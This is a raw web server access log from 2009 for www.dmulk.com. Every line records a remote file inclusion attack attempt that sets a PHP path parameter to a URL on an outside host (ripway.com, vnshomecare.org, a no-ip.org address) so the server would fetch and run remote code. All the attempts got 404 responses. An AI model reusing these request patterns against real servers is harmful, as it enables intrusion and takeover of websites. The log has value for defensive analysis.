66.240.176.66 - - [16/Sep/2009:12:22:05 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.240.176.66 - - [16/Sep/2009:12:22:05 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/ryow/respon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.14.106.24 - - [16/Sep/2009:12:22:50 -0700] "GET /skin/ggambo7002_board/write.php?dir=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.14.106.24 - - [16/Sep/2009:12:22:50 -0700] "GET /logs/access_090903.log%20%20/skin/ggambo7002_board/write.php?dir=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.14.106.24 - - [16/Sep/2009:12:22:50 -0700] "GET /logs/skin/ggambo7002_board/write.php?dir=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:12:23:02 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
